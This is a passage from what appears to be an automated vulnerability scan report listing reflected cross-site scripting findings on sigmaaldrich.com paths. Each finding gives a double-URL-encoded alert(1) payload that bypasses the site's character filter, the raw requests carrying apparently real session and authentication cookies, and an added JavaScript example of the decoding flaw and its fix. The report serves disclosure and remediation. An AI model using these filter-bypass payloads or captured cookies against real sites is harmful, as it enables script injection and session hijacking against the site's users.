fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:11 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography8a414";alert(1)//e5c2d52ef49/vials.html","E404") ;
   </script>
...[SNIP]...

1.34. http://www.sigmaaldrich.com/analytical-chromatography/vials.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/vials.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0007%2522%253balert%25281%2529%252f%252f9c4b8e8fae9 was submitted in the REST URL parameter 2. This input was echoed as b0007";alert(1)//9c4b8e8fae9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatography/b0007%2522%253balert%25281%2529%252f%252f9c4b8e8fae9 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:13 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/b0007";alert(1)//9c4b8e8fae9","E404") ;
   </script>
...[SNIP]...

1.35. http://www.sigmaaldrich.com/analytical-chromatography/video.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/video.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c481b%2522%253balert%25281%2529%252f%252f5d2237e005e was submitted in the REST URL parameter 1. This input was echoed as c481b";alert(1)//5d2237e005e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /analytical-chromatographyc481b%2522%253balert%25281%2529%252f%252f5d2237e005e/video.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:12 GMT
Content-Length: 28940
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatographyc481b";alert(1)//5d2237e005e/video.html","E404") ;
   </script>
...[SNIP]...

1.36. http://www.sigmaaldrich.com/analytical-chromatography/video.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /analytical-chromatography/video.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 875ec%2522%253balert%25281%2529%252f%252f656691d2482 was submitted in the REST URL parameter 2. This input was echoed as 875ec";alert(1)//656691d2482 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character, so that the web server's decode yields the harmless-looking %3c and the application's own second decode turns it into <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
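To make the decode ordering in the remediation note above concrete, the following is an added example (not code from the report or from the site it describes). It models the web server's single URL-decode, a character filter run on that result, and the application's needless second decode, showing why the filter passes 875ec%2522%253balert%25281%2529%252f%252f656691d2482 while the echoed value ends up as 875ec";alert(1)//656691d2482, and contrasts two corrected orderings. The filter's denylist, the handler names and the percent-encoding helper are assumptions; the payload and echoed value are the ones reported for REST URL parameter 2.

```javascript
// Added example, not code from the report or from the site it describes.
// Models the decode/validate ordering criticised in the remediation note:
// the web server decodes the path once, a character filter runs, and then
// the application decodes a second time before echoing the value.
// The denylist, handler names and encoding helper are assumptions.

const REPORTED_PAYLOAD = '875ec%2522%253balert%25281%2529%252f%252f656691d2482';
const DECODED_TWICE    = '875ec";alert(1)//656691d2482';

// Percent-encodes every non-alphanumeric character (ASCII input only) with
// lowercase hex, the style the scanner used. Applying it twice rebuilds the
// reported payload from the plaintext that was finally echoed.
function percentEncodeAll(s) {
  return s.replace(/[^A-Za-z0-9]/g,
    c => '%' + c.charCodeAt(0).toString(16).padStart(2, '0'));
}
function doubleEncode(s) {
  return percentEncodeAll(percentEncodeAll(s));
}

// Assumed denylist; the report only says that "certain characters that are
// often used in XSS attacks" are blocked.
const BLOCKED = /["'<>;()\\]/;
function looksDangerous(s) {
  return BLOCKED.test(s);
}

// decodeURIComponent throws on malformed sequences (e.g. a bare "%" that a
// first decode can produce); treat that as a rejection rather than a crash.
function tryDecode(s) {
  try { return decodeURIComponent(s); } catch (e) { return null; }
}

// Vulnerable ordering: server decode -> filter -> second decode -> echo.
// The filter sees only "%22", "%3b" and friends, which it does not block.
function vulnerableHandler(segment) {
  const once = tryDecode(segment);                 // what the web server does
  if (once === null || looksDangerous(once)) return { blocked: true, echoed: null };
  const twice = tryDecode(once);                   // the needless second decode
  if (twice === null) return { blocked: true, echoed: null };
  return { blocked: false, echoed: twice };
}

// Fix 1: drop the second decode. Filter and echo now see the same string the
// server produced, and a literal "%22" is inert inside a JavaScript string.
function singleDecodeHandler(segment) {
  const once = tryDecode(segment);
  if (once === null || looksDangerous(once)) return { blocked: true, echoed: null };
  return { blocked: false, echoed: once };
}

// Fix 2: if a second decode really is required, canonicalise first and
// validate last, so the filter sees exactly what will be echoed.
function validateAfterCanonicaliseHandler(segment) {
  const once = tryDecode(segment);
  const canonical = once === null ? null : tryDecode(once);
  if (canonical === null || looksDangerous(canonical)) return { blocked: true, echoed: null };
  return { blocked: false, echoed: canonical };
}
```

The denylist is deliberately crude; the point is the ordering, not the character set. Even with the corrected ordering the echoed value still has to be output-encoded for the JavaScript string context it lands in, which is a separate control from input validation.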

Request

GET /analytical-chromatography/875ec%2522%253balert%25281%2529%252f%252f656691d2482 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:14 GMT
Content-Length: 28930
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/analytical-chromatography/875ec";alert(1)//656691d2482","E404") ;
   </script>
...[SNIP]...

1.37. http://www.sigmaaldrich.com/author/site-level/mobile.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /author/site-level/mobile.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 738a7%2522%253balert%25281%2529%252f%252fe6da8202b7b was submitted in the REST URL parameter 1. This input was echoed as 738a7";alert(1)//e6da8202b7b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character, so that the web server's decode yields the harmless-looking %3c and the application's own second decode turns it into <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /author738a7%2522%253balert%25281%2529%252f%252fe6da8202b7b/site-level/mobile.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:06 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/author738a7";alert(1)//e6da8202b7b/site-level/mobile.html","E404") ;
   </script>
...[SNIP]...

1.38. http://www.sigmaaldrich.com/author/site-level/mobile.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /author/site-level/mobile.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 873ad%2522%253balert%25281%2529%252f%252f83dd3b63e22 was submitted in the REST URL parameter 2. This input was echoed as 873ad";alert(1)//83dd3b63e22 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this can be circumvented by double URL-encoding the required characters: for example, by submitting %253c instead of the < character, so that the web server's decode yields the harmless-looking %3c and the application's own second decode turns it into <.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /author/site-level873ad%2522%253balert%25281%2529%252f%252f83dd3b63e22/mobile.html HTTP/1.1
Host: www.sigmaaldrich.com
